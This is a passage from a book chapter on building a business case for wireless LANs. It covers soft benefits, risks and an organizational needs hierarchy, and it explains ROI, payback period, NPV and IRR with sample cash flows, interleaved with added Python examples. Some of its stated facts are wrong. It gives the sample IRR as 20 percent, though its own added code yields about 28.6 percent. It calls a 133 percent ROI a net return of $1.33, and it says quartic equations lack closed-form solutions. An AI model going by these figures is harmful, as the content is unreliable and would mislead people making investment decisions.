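    traveling_wlan_user: float   # share of WLAN users who also travel


@dataclass
class CostProfile:
    loaded_employee_cost: float  # fully loaded annual cost of a WLAN user
    busday_per_year: int = 220   # the chapter's typical values are 220 or 240
    hours_per_busday: float = 8.0
    min_per_hour: int = 60

    def cost_per_minute(self) -> float:
        """Loaded cost of one minute of a staff member's time (assumed form)."""
        return self.loaded_employee_cost / (
            self.busday_per_year * self.hours_per_busday * self.min_per_hour)


def total_wlan_beneficiaries(org: OrgProfile) -> float:
    """(total employees) x (percent computing) x (mobile computing) x (WLAN mobile)."""
    return (org.total_employees * org.percent_computing
            * org.mobile_computing * org.wlan_mobile)


def total_traveling_beneficiaries(org: OrgProfile) -> float:
    """Office beneficiaries further multiplied by (traveling WLAN user)."""
    return total_wlan_beneficiaries(org) * org.traveling_wlan_user


def daily_staff_benefit(cost: CostProfile, min_converted: float) -> float:
    """Daily sunk cost avoided per user by converting idle minutes."""
    return cost.cost_per_minute() * min_converted


def traveling_min_per_day(min_per_month: float, cost: CostProfile) -> float:
    """Spread a surveyed monthly figure over the business days in a year (assumed)."""
    return min_per_month * 12 / cost.busday_per_year


def survey_mean(minutes: Sequence[float]) -> float:
    """Estimate converted minutes from a survey; the chapter relies on a sample
    of 30 or more responses for the Central Limit Theorem argument."""
    if len(minutes) < 30:
        raise ValueError("need at least 30 responses for a usable mean")
    return mean(minutes)


def annual_benefit(org: OrgProfile, cost: CostProfile,
                   office_min_per_day: float, travel_min_per_month: float) -> dict:
    """Annualized office and traveling productivity benefits."""
    office_daily = (total_wlan_beneficiaries(org)
                    * daily_staff_benefit(cost, office_min_per_day))
    travel_daily = (total_traveling_beneficiaries(org)
                    * daily_staff_benefit(
                        cost, traveling_min_per_day(travel_min_per_month, cost)))
    return {
        "office_annual": office_daily * cost.busday_per_year,
        "traveling_annual": travel_daily * cost.busday_per_year,
    }


if __name__ == "__main__":
    org = OrgProfile(1000, 0.8, 0.5, 0.9, 0.25)      # constructed sample organization
    cost = CostProfile(loaded_employee_cost=100_000.0)
    # 10 min/day for office users and 30 min/month for travelers: figures the
    # chapter calls conservative enough to pass a reviewer's sniff test.
    print(annual_benefit(org, cost, office_min_per_day=10, travel_min_per_month=30))
```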

Qualitative Factors
Qualitative benefits are often referred to as soft or intangible benefits. Even though these benefits are
typically exceedingly hard to convert into a monetary value, they are still valuable to an organization.
Indeed, decisions are often made to pursue initiatives based on strategic drivers. Examples of strategic
initiatives include programs that intend to increase customer satisfaction, reduce customer churn, or
provide the organization with enhanced scaling capabilities to support mergers and acquisitions
(M&A)-driven or organic growth.
Earlier in this chapter, we considered the example of Starbucks, which decided to provide WLAN
connectivity in its coffee shops. The rationale for this project was to enhance the customer's experience
and hence boost customer satisfaction. This increases customer loyalty, which results in more repeat
business. In addition, because customers now have Internet access, the average stay becomes longer
and potentially leads to more servings per customer.
The primary goal of the majority of strategic initiatives is to either increase revenues or reduce costs.
The linkage between such programs and WLANs is often too complex and too long to permit easy
quantification. In the Starbucks example, this translates into determining the effect of WLANs on the
creation of repeat business and growing the number of servings per customer.
Even though this value could, in theory, be determined through market studies and surveys, this
calculation is rarely done in practice. Stakeholders make a qualitative assessment and rely on sound
business judgment to find the balance between risks and rewards.
That said, an exhaustive business case does demand that all dimensions are considered, and it is
relatively hard to tell which of the benefits (that is, hard or soft) will have the greatest impact on the
organization. Hence, we strongly recommend that the soft benefits be analyzed, documented, and
included in the WLAN business case to minimize the risk of oversight and to maximize the business
case's credibility and impact.

Risks
Risks are a part of everyday life. They come in all forms, shapes, and sizes. Entire industries revolve
around the management, mitigation, and transfer of risk. The insurance industry is built upon the
transfer of risk. The financial services industry is rife with instruments whose purpose is the
management and transfer of risk.
This section intends to provide a brief overview of the risks associated with WLANs and what can be
done to mitigate, reduce, or transfer them. The goal is to arm you with an awareness of the various
types of risks so that you can not only proactively address them in your business case but also develop a
holistic framework for dealing with them. Chapter 7 is dedicated to one type of risk, the risk of IT security
in the WLAN ecosystem, and Chapter 8, "Management Strategies for Wireless LANs," covers operational
risks as well as strategies and tools for managing this type of risk.
Risk is a double-edged sword. Whenever you introduce a new technology into an environment, you lower
one set of risks while increasing or introducing another set of risks. In the case of WLANs, examples of
risks that are reduced include the unavailability of network connectivity and incapacity to support mobile
applications. Examples of risks that are introduced or increased consist of additional equipment that
needs to be deployed (execution risk) and managed (operational risk) and additional IT security risk
because WLANs provide a new vehicle for disruption, loss, or damage.
Awareness of a problem is the first step toward resolving it. As with any other technology, WLANs carry
a diverse set of risks that span the entire lifecycle of the solution. Identification of these risks and what
will be done to address them and inclusion of this information in the business justification is paramount
to creating a balanced and credible basis for deciding whether to pursue the deployment of WLANs in the
organization.
Figure 2-12 illustrates the organization's vector in the three-dimensional space created by the tangible
benefits, the intangible benefits, and the risks. The depiction not only summarizes the relative sizes of
the benefits and risks but also creates the possibility to display a sensitivity boundary. Because many of
the benefits and risks are based on subjective assessments, variance needs to be included to
accommodate the uncertainty surrounding the parameters. As such, the illustration forms a summarizing
scorecard for how much the organization can benefit from WLANs.

Figure 2-12. Organizational Positioning in Benefit and Risk Dimensions

Upon completion of the identification and analysis of the costs, benefits, and risk components, you can
tackle the next step of constructing the WLAN cost justification.

Cost-Justification Analysis
When it comes to business decision metrics, everybody is looking for the one tell-all metric. This silver
bullet will not only precisely measure the value of your investment but also allow maximization thereof.
However, just as there is no single metric for corporate performance or for the state of the economy,
there is no single measure to assess IT investments and performance. A collection of measurements and
assessments is required to form a relevant and accurate snapshot or projection of the performance of IT
investments.
Before delving further into the quantitative ramifications of WLANs, you need to understand the position
of WLANs in the IT value chain so that you can place the benefits of WLANs in a more appropriate
context.
WLANs form an integral part of today's IT transport portfolio. These assets exist to move information
from a point of origin to a point of consumption. The challenge that you face when evaluating the value
of such assets is that these types of assets are located at the bottom of the IT hierarchy. You can think
of this hierarchy as conceptually similar to the hierarchy of human needs developed by Abraham
Maslow, one of the founders of humanistic psychology, in the 1940s. Maslow posited that human beings
employ a hierarchy when it comes to fulfilling their needs. The precondition for fulfilling higher-order
needs is that lower-order, more basic needs must be met first, as shown in Figure 2-13.

Figure 2-13. Maslow's Hierarchy of Human Needs

Maslow's model begins with the fulfillment of physiological needs, such as thirst, hunger, and other basic
needs. After physiological needs are met, humans seek to satisfy needs involving physical safety, such
as protection from bodily harm. After safety is obtained, Maslow then conjectured that humans act to
fulfill their needs for belonging and affection. The next stage in the model is the need for esteem, which
includes self-esteem, respect, and recognition. The final phase that humans seek to realize is the need
for self-actualization. This includes such things as self-fulfillment and job satisfaction.
Fulfillment of each level is sequential in nature, suggesting an intrinsic need to satisfy the more basic
needs before moving to the next level. Maslow's hierarchy of needs is a classic model in human
behavior. But why is this conceptual model relevant to the IT space? Maslow's concept can readily be
mapped to the corporate or institutional ecosystem. Figure 2-14 illustrates this high-level mapping.

Figure 2-14. Hierarchy of Organizational Needs



The basic needs to be fulfilled for any organization include the availability of basic infrastructure. This
refers to fundamentals such as power, transportation, and water from a public infrastructure point of
view; parking space and physical security from a site perspective; power, structural integrity, and air
conditioning for buildings; and finally items such as rack space, fire control, and access security for data
centers. Figure 2-14 refers to these components as basic infrastructure.
Only after the requirements for basic infrastructure have been met can attention be turned to identifying
the necessities in terms of IT infrastructure. This includes both hardware and software. Examples of
hardware include the full range of IT transport, compute, and storage assets, that is, network devices,
servers, clients, and storage arrays. Software includes middleware, operating systems, and database
systems that provide the intelligence to manage the hardware and raw information. No meaning is
associated with the information at this level in the hierarchy. That is the responsibility of the next level.
The next stage in the model is the need to provide meaning to the information. This is achieved through
applications. As the raw information is moved, transformed, and stored, different applications enable the
attribution of semantics. The information now takes on such heterogeneous forms as a phone call, a
video session, an e-mail, or a purchase order.
The information presented by the various applications is in turn used by a variety of organizational
processes that the organization engages in while performing the primary and secondary activities. The
organizational processes provide the ecosystem intelligence that allows the organization to sense and
respond to changes in its internal and external environment. Finally, armed with this ecosystem
intelligence, the organization can pursue its primary goal, which is the creation of value.
This hierarchy is relevant within the context of developing an ROI or cost justification for wireless
networks because of the enabling character of WLANs. That is, the majority of benefits that WLANs
create is not on the same level in the organizational hierarchy. The hierarchy enables you to make this
inter-level relationship between WLAN costs and organizational benefits explicit.
For some types of assets, there is a direct relationship between the costs associated with the asset and
the benefits that can be extracted. Consider, for example, manufacturing equipment. The TCO of this
equipment includes all costs associated with the purchase, installation, and operation of the equipment.
Examples of benefits could include an increase in production velocity (such as more widgets per minute)
or a decrease in cost of goods sold (COGS) as raw materials are used more efficiently. One could
postulate that the costs and benefits are at the same level in the hierarchy of organizational needs. The
benefits are in essence direct.
Now consider WLANs. The main benefits of WLANs can be derived from their enabling character. They
enable mobility of staff and applications, which translates into increased productivity. In some cases,
WLANs translate into lower cabling or equipment expenses. However, this is more the exception than the
rule because the operational cost is typically higher than for wired LANs. Hence, we find that the costs
are at one level of the hierarchy, while the benefits are located at a higher level. The benefits are
indirect.
A good analogy can be found in electrical wiring. The cost tied to the acquisition and installation of
electrical power is relatively straightforward to determine. However, the quantitative benefit is next to
impossible to compute. Indeed, electrical power is an enabler. At home, it permits the use of electrical
appliances such as televisions, dishwashers, and vacuum cleaners. In an organization, it allows the use
of lighting and computers. As such, electricity has an enabling character because the benefits that it
enables are higher up the hierarchy of needs. The same is true for WLANs.
The hierarchy of organizational needs is important for two distinct reasons in the construction of WLAN
cost justifications. First, it provides a framework for defining the boundary of what must and what can be
included in the analysis. You can include benefits that are higher up the hierarchy either in a quantified
form as demonstrated earlier for staff-member productivity or in a qualified form as was the case for
increasing customer satisfaction.
Second, the framework explains the linkage between the WLAN and its application points. As one moves
higher up the hierarchy, it is implicit that the quantified benefits become more abstract. They are also
characterized by an ever-greater degree of subjectivity. However, after the linkage becomes clear, a
higher degree of comfort with the benefits included in the cost justification should result.
After you have defined which benefits are to be included in the organizational justification of WLANs, it is
time to consolidate the cash flows of the identified costs and benefits into metrics that are meaningful to
the decision makers. Because these metrics reflect absolute monetary terms, the benefits included are
limited to those that have thus far been quantified.
The following are the standard metrics for evaluating cash flows associated with costs and benefits:

ROI: The average expected cash flow over the period of the project divided by the initial investment
outlay. ROI provides a satisfactory method of evaluating an investment over a short period of time.
ROI does not take into account the time value of money.
Payback period: The period required to recover the initial investment of the project. This method
of evaluating an investment does not consider all cash flows and does not discount the cash flow.
This method might not be appropriate for evaluating an investment over an extended period of
time.
Net Present Value (NPV): The Present Value (PV) reflects what a future sum of money is worth
today, given a particular rate of return (and inflation). NPV expresses the net value of costs and
benefits in today's monetary terms that is created or destroyed by an investment. It is computed
by taking the PV of the expected future cash flow of an investment and subtracting the initial
investment cost. Alternatively, the NPV can be determined by subtracting the PV of all cash flows
related to costs from the PV of all cash flows from benefits.
Internal Rate of Return (IRR): The interest rate that equates the PV of the expected future cash
flow to the initial investment outlay, where the NPV is equal to zero.
The next sections take a closer look at each metric by using a numerical example. The sample cash flows
shown in Table 2-2 are for illustrative purposes only and are not based on actual WLAN cases.

Table 2-2. Sample 5-Year Cash Flows of WLAN Investment

                 Year 0     Year 1   Year 2   Year 3   Year 4   Year 5   5-Year Total
Total Costs      $500       $200     $200     $200     $200     $200     $1500
Total Benefits   $0         $400     $400     $400     $400     $400     $2000
Net Benefit      ($500)[*]  $200     $200     $200     $200     $200     $500

[*] Parentheses denote a negative value

Return on Investment
The ROI is a key indicator of an investment's value. It expresses the relative total gain of the project
compared to the total cost. Its computation is very straightforward and is performed by dividing the
cumulative expected benefit by the cumulative cost over the analysis period of the WLAN project. The
ROI formula is as follows:
ROI = Total cumulative benefit / Total cumulative cost
The formula yields the expected net return on every monetary unit spent. For the cash flow example in
Table 2-2, the ROI is this:

ROI = $2000 / $1500 = 133 percent


In other words, for every dollar spent, there is a net return of $1.33.
The simplicity of the ROI calculation is its strength. It generates an easy-to-comprehend ratio. However,
it has two considerable drawbacks. First, ROI does not consider the time value of money. The golden
rule in finance is that a dollar today is worth more than a dollar tomorrow. This is because cash can
accrue interest in a risk-free fashion over time when invested in a risk-free instrument such as U.S.
treasury bonds. Additionally, there is the requirement for investing the cash in a risk-free instrument
because cash hidden under the mattress does not accrue interest.

Note
This reasoning assumes that the probability of default of the U.S. government is zero. Let us
plainly accept that assumption.

Hence, future cash flows should be adjusted in value to reflect their true value today. These future
outgoing or incoming cash flows should in effect be discounted. The later section "Net Present Value"
delves deeper into this topic. Because ROI does not consider the time value of money, it tends to
overestimate the return generated by the investment because the nominal future cash flows are inflated
in real terms.
A second drawback is that ROI masks the relative sizes of the cumulative cash flows. An investment of
$100,000 that returns $133,000 has an ROI of 133 percent. Compare this to an investment of
$100,000,000 that yields a monetary benefit of $133,000,000. Yet again, we find an ROI of 133 percent.
It is clear, however, that very different considerations will be made in the latter case. The absolute size
of the investment will result in unlike deliberations about risks and will drive very different decision
criteria.

Payback Period
Another calculation that is easy to understand is the payback period. The payback period defines the
breakeven point of a project and is typically quoted in months. The timer is started at the beginning of
the project, and it is stopped when the cumulative benefits exceed the cumulative costs.
For the example mentioned in Table 2-2, the payback period results are shown in Table 2-3.

Table 2-3. Payback Period Results

Payback Period        Year 0   Year 1   Year 2   Year 3   Year 4   Year 5
Cumulative costs      $500     $700     $900     $1100    $1300    $1500
Cumulative benefits   $0       $400     $800     $1200    $1600    $2000

Figure 2-15 illustrates the breakeven point of costs versus benefits.

Figure 2-15. Identifying the Payback Period

Table 2-3 illustrates that the breakeven point should occur at some point after year 2. If you assume a
linear distribution of costs and benefits on an annual basis, you can compute the exact point of
intersection.
The line section depicting the cumulative costs between year 2 and year 3 goes through the points with
coordinates of (year, cost), which in this case is (2, 900) and (3, 1100). As such, the line is represented
by the equation:
(X - 2) / (3 - 2) = (Y - 900) / (1100 - 900)
or
Y = 200 x X + 500

Note
The function that describes a line that goes through coordinates (a1,b1) and (a2,b2) is
constructed as follows:

Similarly, the line depicting the cumulative benefits that goes through the coordinates (2, 800) and (3,
1200) is represented by the equation:
(X - 2) / (3 - 2) = (Y - 800) / (1200 - 800)
or
Y = 400 x X
Solving both equations for X results in this:
400 x X = 200 x X + 500
or
X = 2.5 (years)
Multiplying X by 12 results in the number of months for the payback period, which is 30 months for this
example.
Payback period is important because it measures the duration to the point that the investment starts
generating positive cash flow. The further out in time this breakeven point is, the more risky the project
should typically be considered.
Finally, payback period has its drawback in that it communicates nothing about the return size. It only
measures the time to a positive return.
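The interpolation just carried out for Table 2-3, as an added Python example (this is not code from the book). Rather than solving the two line equations separately, it interpolates the difference between cumulative benefits and cumulative costs inside the breakeven year; because the difference of two straight-line segments is itself a straight line, this locates the same intersection point. The arrays, function names, and the linear-within-year assumption are this example's own; the cash flows are those of Table 2-2, in thousands.

```python
# Added example (not from the book): payback period with linear interpolation
# inside the breakeven year, generalizing the Table 2-3 calculation.
from itertools import accumulate
from typing import List, Optional, Sequence

# Constructed from Table 2-2: annual costs and benefits in thousands, year 0 first.
ANNUAL_COSTS = [500, 200, 200, 200, 200, 200]
ANNUAL_BENEFITS = [0, 400, 400, 400, 400, 400]


def cumulative(values: Sequence[float]) -> List[float]:
    """Running totals, i.e. the 'Cumulative costs' / 'Cumulative benefits' rows."""
    return list(accumulate(values))


def payback_period_years(costs: Sequence[float], benefits: Sequence[float]) -> Optional[float]:
    """Years until cumulative benefits first reach cumulative costs.

    Assumes cash flows are spread linearly within each year (the book's
    assumption), so the crossing point inside the breakeven year is found by
    interpolating the gap between the two cumulative lines. Returns None if
    the project never pays back within the horizon given.
    """
    cum_costs = cumulative(costs)
    cum_benefits = cumulative(benefits)
    # gap[y] = cumulative benefits minus cumulative costs at the end of year y
    gap = [b - c for b, c in zip(cum_benefits, cum_costs)]
    if gap[0] >= 0:
        return 0.0
    for year in range(1, len(gap)):
        if gap[year] >= 0:
            # The gap is negative at year-1 and non-negative at year, so it
            # crosses zero at fraction -prev / (cur - prev) of that year.
            prev, cur = gap[year - 1], gap[year]
            return (year - 1) + (-prev) / (cur - prev)
    return None


def payback_period_months(costs: Sequence[float], benefits: Sequence[float]) -> Optional[float]:
    """Same result expressed in months, the unit the book quotes."""
    years = payback_period_years(costs, benefits)
    return None if years is None else years * 12


if __name__ == "__main__":
    print("cumulative costs:   ", cumulative(ANNUAL_COSTS))
    print("cumulative benefits:", cumulative(ANNUAL_BENEFITS))
    print("payback (years): ", payback_period_years(ANNUAL_COSTS, ANNUAL_BENEFITS))
    print("payback (months):", payback_period_months(ANNUAL_COSTS, ANNUAL_BENEFITS))
```

For the Table 2-2 flows this returns 2.5 years, or 30 months, the same figure the line-intersection solution gives. The None return is worth keeping: a project whose cumulative benefits never catch up within the analysis horizon has no payback period, and reporting a number there would hide exactly the risk the section says the metric is meant to surface.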

Net Present Value


The "Return on Investment" section introduced the time value of money concept. This concept is based
on the fact that cash that is invested today will increase in value by some future date through the
accrual of interest. Because of this accrual of interestand interest on interesta cash flow today is worth
more than the same cash flow in the future. The idea is that you can invest the cash that you receive
today and accrue interest on it. If you receive the same principal amount in the future, you have the
opportunity cost of the interest that you miss out on. Hence, cash today is worth more than the same
amount of cash tomorrow. The exact amount by which these cash flows differ depends on two
parameters:
The interest rate, which shall be further discussed shortly
The number of compounding periods
Interest in its turn accrues interest with time, and hence there is a compounding effect.

The discounting of future cash flows to their PV enables the direct comparison of present and future cash
flows. The cash flows have been normalized in time to represent today's value in monetary terms. NPV
refers to the fact that the PV of all outgoing cash flows (that is, the PV of the costs) is subtracted from the
PV of the incoming cash flows (that is, the PV of the benefits). The result is the "net" value today.
To determine the PV of a future cash flow, identify the exact time of the cash flow so that the correct
number of compounding periods can be established. Next, select the right discount rate.
One option for selecting the discount rate is to set it equal to the interest rate that could be earned
elsewhere by investing the cash. Depending on risk averseness, the cash could be invested in risk-free
U.S. government bonds, stocks, or complex instruments such as derivatives. Each of these instruments
yields a particular interest rate that is related to the degree of risk associated with it. Because the cash
spent on the project will not be invested in other instruments, it creates an opportunity cost. The
interest rate of this opportunity cost is the basis for the discount rate.
Alternatively, the discount rate can be set to the Weighted Average Cost of Capital (WACC) of the
organization. The WACC reflects how much it costs your organization to borrow money over time. It is a
function of many different factors, including the risk-free rate, the organization's cost of debt, the cost of
equity, the capital structure (debt/equity ratio), and the tax rate. We suggest that you ask your finance
department to provide you with the WACC for your organization.
Either the interest rate of the opportunity cost or a risk-adjusted discount rate can be used as the PV
discount rate for the future cash flows. Given that higher discount rates result in smaller PVs, the
discount rate can be biased upward or downward to modify the project's risk profile. Higher discount
rates should be employed for riskier projects, whereas lower discount rates are more appropriate for less
risky initiatives.
The formula to compute the PV of a cash flow that occurs in year m, given a discount rate of r, is this:

The present value of a series of annual cash flows that start in year 0 and end in year n is computed,
assuming the discount rate r, as this:

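The two present-value relations the preceding sentences describe, written out as an added illustration in the book's plain-text notation (these are the standard discounting identities, not the book's own figures). CF_m is used here for the cash flow of year m; r and n are as defined above:

PV(CF_m) = CF_m / (1 + r)^m

PV(CF_0, ..., CF_n) = CF_0 + CF_1 / (1 + r) + CF_2 / (1 + r)^2 + ... + CF_n / (1 + r)^n

For the example's year-1 net benefit of $200 (thousand) at r = 10 percent, the first relation gives 200 / 1.1 = 182; applying the second relation to the net-benefit row of the example, with the per-year figures rounded to whole thousands, gives -500 + 182 + 165 + 150 + 137 + 124 = 258 (thousand).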
The formula can be applied to our example to compute the NPV in two different ways. Either the PV of
the cash flows of the costs can be subtracted from the PV of the cash flows of the benefits, or the PV of
the net annual benefits can be computed. For this example, we assume a discount rate of 10 percent.
The calculation of the PV of the net annual benefits is shown in Table 2-4.

Table 2-4. Present Values of Sample 5-Year Cash Flows of WLAN Investment (In thousands)

                   Year 0   Year 1   Year 2   Year 3   Year 4   Year 5
Total Costs[*]     ($500)   ($200)   ($200)   ($200)   ($200)   ($200)
PV (Costs)         ($500)   ($182)   ($165)   ($150)   ($137)   ($124)
Total Benefits     $0       $400     $400     $400     $400     $400
PV (Benefits)      $0       $364     $331     $301     $273     $248
Net Benefit        ($500)   $200     $200     $200     $200     $200
PV (Net Benefit)   ($500)   $182     $165     $150     $137     $124

[*] All totals are in thousands

Compare the nominal cash flows represented in Figure 2-16 with the PV of these respective cash flows
illustrated in Figure 2-17. The impact of compounded discounting can clearly be seen in that it decreases
PV of cash flows that are further out in time.

Figure 2-16. Nominal Annual Cash Flows

Figure 2-17. Present Value of Annual Cash Flows

Application of the formula to the net benefits of our example yields the following:

Note
Fortunately, Microsoft Excel provides a built-in function for NPV computation. The function is
named NPV and takes the discount rate and cash flows as inputs. It should be noted that the
cash flows used in the formula start in year 1, not year 0. Hence, when calculating the NPV,
you need to add the cash flow of year 0 to the result of the function. For our example, the
Excel formula becomes
Net_Present_Value = -500 + NPV(10%, 200, 200, 200, 200, 200)
The Excel NPV function takes discrete values, cell names, or cell ranges as inputs.

Because the Net Present Value computation increases the effect of current cash flows and decreases the
impact of future costs and benefits, the following general conclusions can be drawn:
Projects with low initial expenses and higher initial benefits generate higher NPVs.
Projects with high initial expenses and benefits that increase over time produce lower NPVs.
Determining the NPV of a project is an often-used and accurate method for determining the financial
viability of the project. The use of an appropriate discount rate not only ensures that some degree of risk
is accounted for but also generates a quantified metric in today's monetary terms of the net expected
gain.
However, NPV is not perfect. One of the pitfalls is that projects that generate enormous savings far in
the future (the cash flows of benefits look like a hockey stick) will result in NPVs that are substantial. You
should remain aware of the simple fact that the further out in time you project, the more uncertainty is
associated with the projection. The use of a constant discount rate cannot capture this issue. One
potential remedy would be to use variable discount rates with higher discount rates further out in the
future to accommodate for the additional uncertainty. Hence, you should consider not only the NPV but
also the profile of the cash flows to identify whether a project that is financially attractive in NPV terms is
nonetheless too risky.

Internal Rate of Return


The IRR calculation looks at the current and future net cash flows from a proposed project and
determines an interest rate such that the NPV of the project becomes zero. The rate should be thought
of as the interest rate that another investment would have to exceed to become more interesting than
the project under consideration.
In mathematical terms, the IRR is the discount rate that makes the NPV equal to zero. The formula
becomes

The cash flows are given, and the discount rate r needs to be computed. Given the fact that zeros of
fourth and higher-order polynomials cannot be determined in closed form, they need to be
approximated using computer programs that perform iterative approximations. These programs guess
values and perform continuous refinements until the equation results in zero or a number very close to
zero.

Note
Microsoft Excel has a built-in function for computing IRR. Not surprisingly, the function's name
is IRR, and its parameters are the cash flows starting with year 0. For our example, the Excel
formula becomes
IRR = IRR(-500, 200, 200, 200, 200, 200)
The Excel IRR function takes discrete values, cell names, or cell ranges as inputs.

For the sample cash flows, the discount rate (that is, the IRR) that results in an NPV of zero is 20
percent.

As is the case for the other metrics, IRR has its weakness. Similar to ROI, IRR does not provide
information on the absolute value in monetary terms of the benefit generated by a project. A project
with an NPV of $1,000,000 can have an IRR of 29 percent, as can a project with an NPV of $258.
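The NPV and IRR sections above, combined in one added Python example (not the book's own code or its Excel formulas): npv discounts year-0 through year-n cash flows at a constant rate, pv_row reproduces the rounded per-year figures of Table 2-4, and irr solves NPV = 0 by bisection, the kind of iterative refinement the IRR section describes. The constants, function names, and the bracket used for the search are assumptions of this example; the cash flows are Table 2-2's, in thousands.

```python
# Added example (not from the book): NPV and IRR for the Table 2-2 cash flows.
# All amounts are in thousands; index 0 is year 0 (the initial outlay).
from typing import List, Optional, Sequence

# Constructed from Table 2-2 (costs entered as negative flows).
COSTS = [-500, -200, -200, -200, -200, -200]
BENEFITS = [0, 400, 400, 400, 400, 400]
NET_BENEFITS = [c + b for c, b in zip(COSTS, BENEFITS)]   # [-500, 200, 200, 200, 200, 200]


def present_value(cash_flow: float, year: int, rate: float) -> float:
    """Discount one cash flow occurring in `year` at discount rate `rate`."""
    return cash_flow / (1.0 + rate) ** year


def npv(cash_flows: Sequence[float], rate: float) -> float:
    """Net present value of year-0..n cash flows at a constant discount rate.

    Year 0 is not discounted, which is why the book's Excel note adds the
    year-0 flow outside Excel's NPV() function.
    """
    return sum(present_value(cf, year, rate) for year, cf in enumerate(cash_flows))


def pv_row(cash_flows: Sequence[float], rate: float) -> List[int]:
    """Per-year present values rounded to whole thousands, as laid out in Table 2-4."""
    return [round(present_value(cf, year, rate)) for year, cf in enumerate(cash_flows)]


def irr(cash_flows: Sequence[float], low: float = 0.0, high: float = 1.0,
        tol: float = 1e-12, max_iter: int = 200) -> Optional[float]:
    """Discount rate at which NPV is zero, located by bisection on [low, high].

    Bisection is used instead of Newton's method because it cannot diverge;
    it only needs NPV to change sign across the bracket. If there is no sign
    change (for example, a project that never recovers its outlay), there is
    no IRR in that range and None is returned rather than a misleading rate.
    """
    f_low, f_high = npv(cash_flows, low), npv(cash_flows, high)
    if f_low == 0.0:
        return low
    if f_high == 0.0:
        return high
    if f_low * f_high > 0:
        return None
    for _ in range(max_iter):
        mid = (low + high) / 2.0
        f_mid = npv(cash_flows, mid)
        if abs(f_mid) < tol or (high - low) / 2.0 < tol:
            return mid
        if f_low * f_mid < 0:
            high, f_high = mid, f_mid
        else:
            low, f_low = mid, f_mid
    return (low + high) / 2.0


if __name__ == "__main__":
    rate = 0.10
    print("PV (Costs):      ", pv_row(COSTS, rate))
    print("PV (Benefits):   ", pv_row(BENEFITS, rate))
    print("PV (Net Benefit):", pv_row(NET_BENEFITS, rate))
    print("NPV at 10%: %.1f (thousand)" % npv(NET_BENEFITS, rate))
    r = irr(NET_BENEFITS)
    print("IRR: %.1f%%" % (100 * r) if r is not None else "IRR: none in bracket")
```

At 10 percent the two ways of computing the NPV that the text describes (PV of benefits minus PV of costs, or PV of the net flows) agree, at about 258 thousand. The bisection converges to roughly 28.6 percent for these flows, which is the NPV-of-$258, IRR-near-29-percent pairing the section's last paragraph cites. The bracket [0, 1] covers rates from zero to 100 percent; widen it only if you expect an IRR outside that range, and check that the sign of the NPV actually changes across it.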

Summary
Today's environment is characterized by an increased degree of financial scrutiny and accountability. The
necessity for a holistic and robust business case is more dominant than ever before. As such, an
exhaustive understanding and assessment of all the costs, benefits, and risks associated with WLAN
deployments lies on the critical path to successfully using WLANs in your organizational ecosystem.
Business leadership is not limited to cost control. Strategic drivers such as increasing customer
satisfaction or decreasing customer churn drive the top line. Increasing or sustaining the top line is at
least as important as reductions in operating expenses.
This chapter focused on the strategic, tactical, and financial business considerations when evaluating
WLAN solutions for your institution. It introduced you to methodologies and frameworks that facilitate
the process of business-technology alignment and the identification of key application areas of WLANs
within the organization. The strategic, operational, financial, and technological impact of WLANs on the
value-creation process of your organization was touched upon, as were the benefits and constraints of
wireless compared to wired solutions.
This chapter also covered the process of performing a thorough cost-justification analysis. Parameters
such as TCO and benefits that can readily be quantified were discussed. Furthermore, intangible benefits
that are related to the strategic impact of WLANs were revealed. Finally, risks associated with WLANs
were clarified to ensure an exhaustive business case.
Finally, this chapter explained the standard methods for consolidating the cash flows of the identified
costs and benefits into metrics that are meaningful to decision makers and stakeholders. The
construction of the ROI, payback period, NPV, and IRR was further explained as were the pros and cons
associated with each metric.
Armed with this knowledge, you are well positioned to tackle the next phase in constructing your WLAN
business case. These phases consist of determining the specific WLAN design for your organization and
strategies for effectively implementing and operating them. These are the topics of the next chapters.

Chapter 3. Preparation and Planning

Chapter 1, "Introduction to Wireless LAN Technologies," introduced you to the high-level technological
concepts of WLAN solutions. Chapter 2, "Business Considerations," focused on the strategic and financial
business considerations when evaluating WLAN solutions for your institution. This chapter focuses on
further aspects of preparation and planning considerations that are critical for successfully leveraging
your enterprise WLAN. It also provides a structured approach for your deployment, highlighting areas
that require preparatory work, because you need to identify management and technical dependencies
that are unique to your circumstances.
This chapter adopts a "60,000-foot view" of the challenges ahead and asks you to answer some key
questions on technical, financial, and program management issues. The chapter also introduces such
topics as strategic preparation and planning, architectural considerations, and program management.
Upon completion, you will be prepared to describe in strategic terms where you will deploy, how you will
deploy, and how you will fund and manage your deployment.

Solutions Lifecycle
The lifecycle of your WLAN project can be broken down into discrete yet related phases. This is known as
your solutions lifecycle. The phases are preparing, planning, designing the architecture, implementing
the solution, operating the infrastructure, and finally optimizing the system (PPDIOO). Note that this is
not a linear but rather a circular process. Lessons learned and best practices are essential for a better,
faster, and more cost-effective design. They can be used to continuously develop and perfect the final
solution. Figure 3-1 illustrates the PPDIOO lifecycle.

Figure 3-1. PPDIOO Solutions Lifecycle

Ultimately, the goal of technology investments is to maximize the business's benefit while
simultaneously minimizing both the technology's and project's risk. A sound business case and positive
Net Present Value (NPV) for your WLAN project alone are not sufficient to ensure that you accrue the full
benefits from your WLAN. Indeed, identifying, qualifying, and quantifying the business drivers are only
the first steps in turning your vision into reality. Proper preparation, planning, and execution are vital to
getting the solution deployed.
Typically, preparation includes such aspects as identifying the business case and requirements, defining
the enterprise's wireless strategy, and working on return on investment (ROI). Preparing your WLAN
deployment also means examining the current enterprise business and network infrastructure, defining a
funding model, and then deciding the breadth and scope of your deployment.
Planning is the "opening" step in the project proper, where you create your project teams and have your
first planning kickoff meeting. You also identify your key resources and detail your high-level project
plan or schedule. Of course, each enterprise and each deployment is unique, and the solutions lifecycle
should be considered simply as a tool to help tailor and manage the WLAN project to your needs. This
chapter takes you through the most common steps in the preparation and planning stages.
There is simply no single "best approach." There are no standard, canned answers or solutions to the
questions that are covered in this chapter. However, by providing a structured methodology for tackling
the challenges at hand, the solutions that are specific and relevant to your organization will more readily
present themselves.

Preparation
The preparation phase of your deployment is a critical initial step. Careful consideration of the issues at
this early stage will greatly increase the probability of a smooth and successful deployment. The primary
task associated with the preparation phase of the PPDIOO solution lifecycle is identifying and validating
the business case. This was covered in detail in Chapter 2. Additional factors that require attention when
you prepare your WLAN deployment include defining the breadth and scope of the WLAN and deciding
how you will fund the project.
Generic solutions typically produce average results. By considering the topics defined in this section, you
can proceed in a prepared manner with your goals and constraints clearly defined and understood.
After you have defined your goal, you can carefully prepare your deployment plans. In Chapter 2, you
effectively considered why a WLAN might be a good investment for your enterprise network. This
chapter focuses on what you need to consider when planning a WLAN and how you will deploy it. It is all
